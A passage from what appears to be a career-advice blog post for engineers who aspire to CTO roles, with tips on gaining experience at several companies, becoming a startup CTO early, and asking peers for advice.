Seeing different companies helps in developing a feel about the right practices, methodologies and technologies.
Be a CTO at a startup
You don’t need to have 20 years of experience to be a CTO of a startup. How old was your CTO when he started his first role as a CTO?
Ask a friend
I’m in many groups of VPs of R&D and CTOs, and what I read there matches what every consultant I’ve worked with has told me: people ask each other. All the time. What’s the recommended technology for this type of problem, what do others think of a specific solution, etc. No one works alone, although sometimes it looks that way. Good software is a collaborative artefact.
Thanks for reading this article! Feel free to leave a comment below.